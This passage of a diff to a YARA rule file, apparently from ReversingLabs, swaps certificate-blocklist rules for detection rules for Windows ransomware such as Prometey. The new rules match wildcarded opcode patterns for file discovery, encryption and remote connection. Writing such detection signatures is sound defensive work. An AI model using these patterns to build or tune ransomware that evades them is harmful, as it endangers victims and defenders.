+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ??
+            ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B
+            4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ??
+            57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B
+            55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9
+            ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 72 ??
+            81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B 4D
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
+        }
+		$encrypt_files_p4 = {
+            50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F
+            59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? E8 ??
+            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 57 50 E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45
+            ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 53
+            FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 0F 1F 84 00 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F0 83 C4
+            ?? 85 F6 74 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66
+            0F 1F 84 00 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8
+            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 56 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 ??
+            ?? ?? ?? 57 56 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 50 6A ?? 53 FF 15 ?? ??
+            ?? ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ??
+            ?? 50 FF B6 ?? ?? ?? ?? 53 FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 6A ?? 6A
+            ?? 6A ?? FF 35 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 0F
+            84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ??
+            ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 8B 45 ?? 03 C0 50 E8 ??
+            ?? ?? ?? 8B F0 83 C4 ?? 80 3E ?? 74 ?? 8B 45 ?? 8B CE 85 C0 74 ?? 66 90 C6 01 ?? 8D
+            49 ?? 83 E8 ?? 75 ?? 8D 45 ?? 50 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF D7 6A ?? 8D 45 ?? 50 8B 45 ?? FF B0 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8B 45 ?? FF B0 ?? ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 6A ?? 50 FF 75 ?? FF
+            15
+        }
+		$remote_connection = {
+            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 83 79 ?? ?? 72 ??
+            8B 09 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 57 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85
+            F6 0F 84 ?? ?? ?? ?? 8B 4D ?? 53 83 79 ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? BB ?? ?? ?? ?? EB ?? 51 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BB
+            ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 8B C8 6A ?? E8 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ??
+            ?? 66 89 4D ?? 8D 4D ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8D 4D
+            ?? 83 E3 ?? E8 ?? ?? ?? ?? F6 C3 ?? 5B 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
+            4D ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 0F
+            43 45 ?? 50 68 ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F
+            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 3D ?? ??
+            ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 45 ??
+            85 C0 74 ?? C6 84 05 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ??
+            ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 ?? 8B 7D
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
+            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D
+            ?? ?? 8D 4D ?? 8B 45 ?? 8D 55 ?? 0F 43 4D ?? 8B 75 ?? 03 C1 83 7D ?? ?? 8D 4D ?? 52
+            0F 43 4D ?? 50 51 8B CE E8 ?? ?? ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8D 4D
+            ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digiwill Limited" and pe.signatures [ i ] . serial == "47:6d:e2:f1:08:d2:0b:43:ba:3b:ae:6f:33:1a:f8:f1" and 1588135722 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_08Ddcc67F8Cad6929607E4Cda29B3503 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Prometey : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Prometey ransomware."
 		author = "ReversingLabs"
-		id = "3563547f-556b-56e3-ad25-cfec0294fe93"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a5902fc6-2752-520f-be84-df9ea7b1e27d"
+		date = "2021-06-07"
+		modified = "2021-06-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4234-L4250"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4cd975312ca825b51f34f5c89184a56526877436224c1e7407d715b28ebfd9d5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Prometey.yara#L1-L156"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f14c9605e2d375176b461fd396be66754b0ace7dcaada8ca33ad86f6eda10b73"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Prometey"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
+            ?? ?? ?? ?? 6A ?? 5E 8D 85 ?? ?? ?? ?? 89 75 ?? 50 BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B 8D 4D ?? 88 5D ?? E8 ?? ??
+            ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
+            C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 33 DB 53 53 53 53 50 88 5D
+        }
+		$remote_connection_p2 = {
+            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 53 56 53 53 6A ?? 68 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 DB 74 ?? 6A ?? 68 ?? ?? ?? ??
+            33 C0 50 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ??
+            33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF 75 ?? FF D7 80 7D ?? ?? 74 ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D
+            ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? E8
+        }
+		$find_files_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D 4D ?? 8B D3 C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ??
+            ?? 33 C0 8D 7D ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ??
+            ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A
+            ?? 8B 7A ?? 2B CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B
+            12 57 52 51 8B CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D
+            ?? 51 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 7D
+            ?? 8B 9D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 0F 43 7D ?? 89 8D ??
+            ?? ?? ?? 3B D8 77 ?? 85 DB 75 ?? 8B F3 EB ?? 0F BE 09 2B C3 40 89 8D ?? ?? ?? ?? 03
+        }
+		$find_files_p2 = {
+            C7 89 85 ?? ?? ?? ?? 2B C7 50 51 57 EB ?? 53 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 46 2B C6 50 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            8B F0 83 C4 ?? 85 F6 75 ?? 83 CE ?? 33 DB 56 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 89 5D ?? 50 8D 4D ?? 89 5D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 7D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 7D ?? 85 D2 74 ??
+            83 C9 ?? 8D 42 ?? 3B C1 0F 42 C8 03 CF EB ?? 2B F7 EB ?? 3B CF 74 ?? 49 80 39 ?? 75
+            ?? 2B CF EB ?? 83 C9 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 79 ?? 89 5D ?? C7 45 ?? ?? ??
+            ?? ?? 88 5D ?? 3B D7 0F 82 ?? ?? ?? ?? 2B D7 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83
+            7D ?? ?? 51 0F 43 45 ?? 8D 4D ?? 03 C7 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC
+            8D 45 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B 78 ?? 03 38 3B FB 7D ?? 81 FE ?? ?? ?? ?? 76 ?? 8D
+        }
+		$find_files_p3 = {
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B FB 7D ?? 81 FE ?? ?? ?? ??
+            76 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D
+            ?? 8D 04 41 50 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? C6 45
+            ?? ?? 56 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 51 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 56 BA ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85
+        }
+		$find_files_p4 = {
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45
+            ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ??
+            ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? ?? 03 F3 59 3B F7 75
+            ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? ?? 03 F3 3B F7 75 ??
+            8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? 59 59 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files = {
+            8B FF 55 8B EC 57 FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B F8 8B 49 ?? 90 F6 C1 ?? 75
+            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? E9
+            ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 90 C1 E8 ?? A8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
+            ?? EB ?? 8B 45 ?? 8B 40 ?? 90 A8 ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 83 61
+            ?? ?? 84 C0 8B 45 ?? 74 ?? 8B 48 ?? 89 08 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45
+            ?? 53 6A ?? 5B 83 C0 ?? F0 09 18 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 ?? 83 60
+            ?? ?? 8B 45 ?? 8B 40 ?? 90 A9 ?? ?? ?? ?? 75 ?? 56 8B 75 ?? 6A ?? E8 ?? ?? ?? ?? 59
+            3B F0 74 ?? 8B 75 ?? 53 E8 ?? ?? ?? ?? 59 3B F0 75 ?? 57 E8 ?? ?? ?? ?? 59 85 C0 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5E FF 75 ?? 8B 5D ?? 53 E8 ?? ?? ?? ?? 59 59 84 C0 75
+            ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? EB ?? 0F B6 C3 5B 5F 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "08:dd:cc:67:f8:ca:d6:92:96:07:e4:cd:a2:9b:35:03" and 1564310268 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_052242Ace583Adf2A3B96Adcb04D0812 : INFO FILE
